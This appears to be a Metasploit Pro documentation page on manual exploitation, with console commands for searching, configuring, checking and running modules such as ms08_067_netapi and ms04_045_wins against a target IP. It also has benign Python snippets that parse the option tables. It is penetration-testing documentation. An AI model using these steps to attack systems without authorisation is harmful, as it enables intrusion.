Manual Exploitation
An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers it to the target system. The most common types of exploit modules are buffer overflow and SQL injection exploits.
To manually run an exploit, you must choose and configure an exploit module to run against a target. You choose the exploit module based on the information you have gathered about the host. For example, if you know that the target is missing the MS08-067 patch and has port 445/139 open, you can run the MS08-067 exploit to attempt exploitation.
Module Search
Before you can configure and run an exploit, you need to search for the module. The console includes the ability to search for modules using search operators.
You use search operators to create a query based on a specific module name, path, platform, author, CVE ID, BID, OSVDB ID, module type, or application. The search returns a list of results that match the query.
The following are search operators that are available:
- name
- path
- platform
- type
- app
- author
- cve
- bid
- osvdb
Search Syntax
To search for a module, use the following syntax:
$ search <search operator>:<search term>
Searching for a Module
Use the search command along with a search operator to search for a module.
msf-pro > search platform:Windows
msf-pro > search type:exploit
msf-pro > search author:hd
msf-pro > search app:client
msf-pro > search name:ms08-067
Showing All Exploit Modules
Use the show command to view a list of the exploits that are available.
msf-pro > show exploits
This can take a few minutes. There are thousands of modules.
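The search syntax above, modelled as an added example (not Metasploit's own code): each operator:term pair in a query must match, several pairs are ANDed together, and a token with no known operator is treated as a bare word matched against the module path or name. The catalog is constructed sample data; its author and reference fields are placeholders rather than a real module index.

```python
# Added example, not Metasploit's own code: a model of the console's search
# syntax, where each operator:term pair must match (pairs are ANDed) and a
# bare word matches the module path or name. CATALOG is constructed data.
OPERATORS = {"name", "path", "platform", "type", "app",
             "author", "cve", "bid", "osvdb"}
CATALOG = [  # constructed sample catalog; reference IDs mostly left empty
    {"path": "exploit/windows/smb/ms08_067_netapi", "type": "exploit",
     "name": "MS08-067 Microsoft Server Service Relative Path Stack Corruption",
     "platform": ["windows"], "app": "server", "author": ["hdm"],
     "cve": ["2008-4250"], "bid": [], "osvdb": []},
    {"path": "exploit/windows/wins/ms04_045_wins", "type": "exploit",
     "name": "MS04-045 Microsoft WINS Service Memory Overwrite",
     "platform": ["windows"], "app": "server", "author": ["hdm"],
     "cve": [], "bid": [], "osvdb": []},
    {"path": "exploit/windows/browser/ms14_012_textrange", "type": "exploit",
     "name": "MS14-012 Internet Explorer TextRange Use-After-Free",
     "platform": ["windows"], "app": "client", "author": ["example-author"],
     "cve": [], "bid": [], "osvdb": []},
    {"path": "auxiliary/scanner/smb/smb_version", "type": "auxiliary",
     "name": "SMB Version Detection", "platform": [], "app": "",
     "author": ["hdm"], "cve": [], "bid": [], "osvdb": []},
]

def parse_query(query):
    """'type:exploit smb' -> ([("type", "exploit")], ["smb"])."""
    pairs, words = [], []
    for token in query.split():
        op, sep, term = token.partition(":")
        if sep and op.lower() in OPERATORS:
            pairs.append((op.lower(), term.lower()))
        else:
            words.append(token.lower())  # unknown operator or no colon: bare word
    return pairs, words

def matches(module, op, term):
    """Case-insensitive substring match of one operator:term against a module."""
    value = module[op]
    if isinstance(value, list):
        return any(term in v.lower() for v in value)
    return term in value.lower()

def search(query, catalog=CATALOG):
    """Return the sorted module paths that satisfy every part of the query."""
    pairs, words = parse_query(query)
    return sorted(m["path"] for m in catalog
                  if all(matches(m, op, t) for op, t in pairs)
                  and all(w in m["path"].lower() or w in m["name"].lower()
                          for w in words))
```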
Loading a Module
Use the use command to load an exploit module. After you issue the use command, the Metasploit Console changes the command prompt to show the loaded module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) >
You can use the Tab key to complete the module path.
Resetting the Current Module Context
Use the back command to reset the prompt and to remove the module that is currently loaded.
msf-pro exploit (ms04_045_wins) > back
msf-pro >
Showing Options for a Module
Use the show command to view a list of options that are available for a particular module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show options
Show Required Options
After an exploit is loaded, you need to set all the required options. To find out what options are required, you can use the show missing command.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show missing
Showing Advanced Options for a Module
Use the show command to view a list of advanced options that are available for an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show advanced
Setting Options for a Module
Use the set command to configure options for a module. You need to specify the option name and the option value, as shown below:
msf-pro exploit (ms04_045_wins) > show options
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST
RPORT  445
msf-pro exploit (ms04_045_wins) > set RHOST 192.168.55.1
Showing the Targets for a Module
Use the show targets command to view a list of potentially vulnerable targets. Most modules display a list of targets that may be vulnerable to the exploit. Each target has an ID and operating system.
If you know the victim machine’s operating system and version, you can specify the target for the exploit. Some modules provide an automatic targeting option. If you are unsure of the operating system or version and the module offers automatic targeting, you can use it to detect the victim machine’s OS and version for you.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets
Exploit targets:
Id  Name
--  ----
0   Windows 2000 English
Check to See if a Target is Vulnerable
Most exploits are version specific. For example, ms14_012_textrange is an exploit for Internet Explorer 9, but it only works against versions of IE9 that were built between July 2013 and February 2014. To use this exploit, you would need to know the exact MSHTML build the target is using.
This is where the check command becomes very handy. You can use the check command to determine if a target is vulnerable to a particular exploit.
msf-pro > use exploit/windows/smb/ms08_067_netapi
msf-pro exploit (ms08_067_netapi) > check 192.168.55.1
[+] 192.168.55.1:445 - the target is vulnerable.
Not all modules support the check command.
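The show options, show missing, set and show targets steps above, modelled as an added example (not Metasploit's own code): it slices the column-aligned tables the console prints, reports the required options that still have no value, applies a set, and reads the target list. SAMPLE_OUTPUT is constructed text, not a capture from a real session, and the Proxies option is included only to show an optional entry.

```python
# Added example, not Metasploit's own code: reads the tables that "show options"
# and "show targets" print; SAMPLE_OUTPUT is constructed, not a real capture.
SAMPLE_OUTPUT = """\
Module options (exploit/windows/wins/ms04_045_wins):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain
   RHOST                     yes       The target address
   RPORT    445              yes       The target port

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 English
"""

def read_table(text, headers):
    """Slice a column-aligned console table into rows of stripped cells. Column
    starts come from the header line, so an empty cell (an unset Current
    Setting) is read as '' instead of shifting the later cells left."""
    lines = text.splitlines()
    idx = next(i for i, ln in enumerate(lines) if all(h in ln for h in headers))
    starts = [lines[idx].index(h) for h in headers]
    bounds = list(zip(starts, starts[1:] + [None]))
    rows = []
    for line in lines[idx + 2:]:  # skip the header line and the dashed rule
        if not line.strip():
            break  # a blank line ends the table
        rows.append([line[a:b].strip() for a, b in bounds])
    return rows

def parse_options(text):
    """'show options' table -> {name: {"value", "required", "description"}}."""
    cols = ("Name", "Current Setting", "Required", "Description")
    return {name: {"value": val, "required": req == "yes", "description": desc}
            for name, val, req, desc in read_table(text, cols)}

def parse_targets(text):
    """'show targets' table -> {id: name}."""
    return {int(tid): name for tid, name in read_table(text, ("Id", "Name"))}

def missing_required(options):
    """What 'show missing' reports: required options that have no value yet."""
    return sorted(n for n, o in options.items() if o["required"] and not o["value"])

def set_option(options, name, value):
    """'set NAME VALUE' applied to a parsed option table."""
    options[name]["value"] = value
    return options
```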
Setting the Target for an Exploit
Use the set target command to specify a target for the exploit.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > show targets
Exploit targets:
Id  Name
--  ----
0   Windows 2000 English
msf-pro exploit (ms04_045_wins) > set target 0
Running an Exploit Module
Use the exploit or run command to run an exploit module.
msf-pro > use exploit/windows/wins/ms04_045_wins
msf-pro exploit (ms04_045_wins) > run
Resetting the Current Module Context
Use the back command to reset the command prompt and to remove the module that is currently loaded.
msf-pro exploit (ms04_045_wins) > back
msf-pro >
Reloading an Exploit
Use the reload command to refresh the metadata and methods for an exploit. This command is handy if you’ve edited the module while in the module context and need to update the module.
msf-pro exploit (ms04_045_wins) > reload